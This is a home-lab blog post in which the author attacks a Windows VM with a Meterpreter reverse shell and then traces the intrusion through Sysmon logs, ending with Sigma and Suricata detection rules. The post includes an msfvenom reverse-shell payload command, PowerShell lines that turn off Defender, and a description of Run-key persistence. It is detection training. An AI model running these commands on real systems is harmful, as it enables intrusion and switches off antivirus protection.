DEV Community

Akshat Tiwari
Akshat Tiwari

Posted on

How I Hunted a Meterpreter C2 Session Using Sysmon

#cybersecurity #infosec #monitoring #tutorial

Introduction

The attacker was already inside. A reverse shell was open, a flag file had been stolen, and Windows Defender was quietly switched off. But none of that happened in silence — Sysmon was watching the entire time.

In this post I'm breaking down exactly how I detected a live Meterpreter C2 session using only Sysmon telemetry during a Red vs Blue simulation I ran in my home lab. No fancy EDR. No threat intel feed. Just Sysmon event logs and knowing what to look for.

The Setup

Two VMs. One goal. Break in and steal the flag — then switch sides and figure out what the logs recorded.

  • Red Team (attacker): Kali Linux — 192.168.1.19
  • Blue Team (target): Windows 10 — 192.168.1.20
  • Detection stack: Sysmon with SwiftOnSecurity config, Wazuh SIEM
  • Exercise: Operation Red Dawn — a solo Red vs Blue simulation

The rules were simple: Red Team operates freely, Blue Team reviews telemetry after and identifies every step of the attack chain. Solo exercise — I played both roles.

The Attack (What Red Team Did)

Here's the full kill chain executed in roughly 23 minutes.

First, I generated a reverse TCP payload using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.19 LPORT=4444 -f exe -o /tmp/update.exe
Enter fullscreen mode Exit fullscreen mode

That produced update.exe — 7,680 bytes, no code signing, no version metadata. I served it from a Python HTTP server on port 8080, then on the Windows side used PowerShell's Invoke-WebRequest to pull it down into C:\Users\Public\.

Before executing, I disabled Windows Defender:

Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath C:\Users\Public
Enter fullscreen mode Exit fullscreen mode

Then Start-Process C:\Users\Public\update.exe — and Meterpreter session 1 opened: 192.168.1.19:4444 -> 192.168.1.20:51174.

From there: enumerated privileges, found SeDebugPrivilege and SeImpersonatePrivilege, installed registry-based persistence at HKCU\Software\ZuQhcxWs with a base64-encoded PowerShell blob and a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\U66ZUIM6, then exfiltrated the dummy flag:

FLAG{R3d_Dawn_2026}
Enter fullscreen mode Exit fullscreen mode

Clean, fast, and mostly undetected in real time. Mostly.

What Sysmon Caught (The Detection)

Switching to Blue Team. Pulling up Wazuh and filtering Sysmon events — here's what the logs handed me.

Detection 1 — Process Creation (Event ID 1)

The moment update.exe executed, Sysmon fired an EID 1. Here's what the key fields looked like:

Image:          C:\Users\Public\update.exe
ParentImage:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion:    -
Description:    -
Company:        -
IntegrityLevel: High
MD5:            02AAE8259567C4AF91CD87693F912E8F
Enter fullscreen mode Exit fullscreen mode

Let me explain why this single event is so loud. Every legitimate executable has metadata — a FileVersion, a Company name, a Description. Something like chrome.exe shows Google LLC. notepad.exe shows Microsoft Corporation. update.exe here shows nothing. Three dashes where the metadata should be.

Then there's the parent process: PowerShell. Legitimate software doesn't get launched by PowerShell at High integrity from a Public folder. C:\Users\Public\ isn't a software installation directory — nothing real lives there. This combination alone is enough to open an incident.

Detection 2 — Network Connection (Event ID 3)

Within seconds of execution, EID 3 fired:

Image:           C:\Users\Public\update.exe
DestinationIp:   192.168.1.19
DestinationPort: 4444
Protocol:        tcp
Enter fullscreen mode Exit fullscreen mode

The same unsigned, no-metadata process that just spawned from PowerShell immediately phoned home on port 4444. That's the Metasploit default C2 port — practically a signature at this point. Any outbound TCP connection on 4444 from a non-browser process should be an immediate alert in your environment. This one confirmed the compromise.

Detection 3 — SmartScreen Triggered (Event ID 1)

There was one more signal I almost missed. Just before update.exe ran, Sysmon logged another EID 1: smartscreen.exe launching to inspect the file. Windows itself tried to wave the red flag before execution. In a production environment with proper alerting, SmartScreen triggering on an executable launched by PowerShell from a Public folder would be worth auto-escalating.

So Sysmon gave me three detection opportunities in under two seconds. The attack wasn't invisible — it was just that no one was watching in real time.

What We Missed (Gaps)

Sysmon caught a lot. But being honest about the gaps matters more.

Gap 1 — Defender disablement. Set-MpPreference -DisableRealtimeMonitoring $true ran without a single alert. Because Tamper Protection was off, one PowerShell cmdlet silently switched off AV. No EID fired. No Wazuh alert. PowerShell Script Block Logging (EID 4104) wasn't configured, so the cmdlet went completely unrecorded.

Gap 2 — Registry persistence. The Metasploit persistence module created HKCU\Software\ZuQhcxWs with a large base64 payload blob and a Run key for auto-execution on logon. Sysmon can log registry changes via EID 13 — but my config wasn't watching HKCU\Software\ for new key creation. Found it manually during investigation. Should have been an automatic alert.

Gap 3 — File exfiltration. The flag left the machine over the existing Meterpreter C2 session. No DLP. No file transfer alerting. No Suricata on the internal interface to catch the data movement. It was gone before I even started the Blue Team review.

Detection Rules We Built After

Two rules came directly out of this exercise.

Sigma — Unsigned EXE from Public Folder:

title: Suspicious Executable from Public Folder
status: experimental
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    Image|contains: '\Users\Public\'
    Description: '-'
  condition: selection
level: high
Enter fullscreen mode Exit fullscreen mode

Suricata — C2 Port 4444 Outbound:

alert tcp $HOME_NET any -> $EXTERNAL_NET 4444 \
(msg:"Meterpreter C2 Port 4444 Outbound"; \
flow:established,to_server; sid:1000080; rev:1;)
Enter fullscreen mode Exit fullscreen mode

Both go into my personal detection library. Every gap Red Team finds, Blue Team closes.

Key Takeaways

  • Sysmon EID 1 is your best friend — process metadata tells the whole story before you look at anything else
  • Unsigned executables from user-writable paths are always suspicious — no legitimate software installs to C:\Users\Public\
  • PowerShell as parent of an unknown EXE means investigate immediately — that combination is not normal
  • Port 4444 outbound from a non-browser process likely means C2 — block it at the firewall and alert on it with Suricata
  • Enable Defender Tamper Protection — one PowerShell cmdlet should not be able to disable your antivirus

Conclusion

That's Operation Red Dawn. A 23-minute compromise, a stolen flag, and a set of Sysmon events that told the full story — if you knew where to look.

This exercise is part of a larger home lab journey I've been documenting — running structured Red vs Blue scenarios from first principles, generating detection rules, and updating response playbooks after every engagement.

The biggest lesson wasn't technical. It was this: attackers don't need to be stealthy if defenders aren't watching. Sysmon had everything. The gap was the alerting pipeline, not the telemetry.

If you're learning Blue Team skills or building a SOC career, drop a comment below. Let's connect.

Top comments (0)